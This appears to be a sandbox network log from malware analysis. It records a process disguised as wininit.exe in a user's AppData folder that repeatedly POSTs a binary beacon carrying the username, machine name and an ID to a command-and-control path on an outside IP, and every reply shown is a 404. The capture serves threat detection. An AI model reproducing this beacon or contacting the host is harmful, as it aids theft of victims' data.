                                                    Nov 20, 2024 11:08:24.629606962 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:08:25.379029989 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:08:25 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    11192.168.2.224917494.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:08:25.542303085 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:08:25.550254107 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:08:26.297723055 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:08:26 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    12192.168.2.224917594.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:08:26.446536064 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:08:26.451548100 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:08:27.189125061 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:08:27 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    13192.168.2.224917694.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:08:27.337290049 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:08:27.342170000 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:08:28.082808018 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:08:27 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    14192.168.2.224917794.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:08:28.285974979 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:08:28.290956020 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:08:29.023233891 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:08:28 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    15192.168.2.224917894.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:08:29.157368898 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:08:29.162280083 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:08:29.900144100 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:08:29 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    16192.168.2.224917994.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:08:30.048729897 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:08:30.056655884 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:08:30.800529003 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:08:30 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    17192.168.2.224918094.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:08:30.937805891 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:08:30.942888975 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:08:31.709690094 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:08:31 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    18192.168.2.224918194.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:08:31.856868982 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:08:31.861943960 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:08:32.666455984 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:08:32 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    19192.168.2.224918294.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:08:32.808886051 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:08:32.814811945 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:08:33.577142954 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:08:33 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    20192.168.2.224918394.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:08:33.718036890 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:08:33.725738049 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:08:34.478512049 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:08:34 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    21192.168.2.224918494.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:08:34.623150110 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:08:34.631910086 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:08:35.458312035 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:08:35 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    22192.168.2.224918594.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:08:35.602694035 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:08:35.612588882 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:08:36.517483950 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:08:36 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    23192.168.2.224918694.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:08:36.661369085 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:08:36.666299105 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:08:37.408440113 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:08:37 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    24192.168.2.224918794.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:08:37.593621016 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:08:37.600393057 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:08:38.490098000 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:08:38 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    25192.168.2.224918894.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:08:38.847771883 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:08:38.858062029 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:08:39.674951077 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:08:39 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    26192.168.2.224918994.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:08:39.811527014 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:08:39.816478014 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:08:40.550285101 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:08:40 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    27192.168.2.224919094.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:08:40.686136007 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:08:40.691051960 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:08:41.450572014 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:08:41 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    28192.168.2.224919194.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:08:41.592729092 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:08:41.600004911 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:08:42.331038952 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:08:42 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    29192.168.2.224919294.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:08:42.465225935 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:08:42.470300913 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:08:43.375627995 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:08:43 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
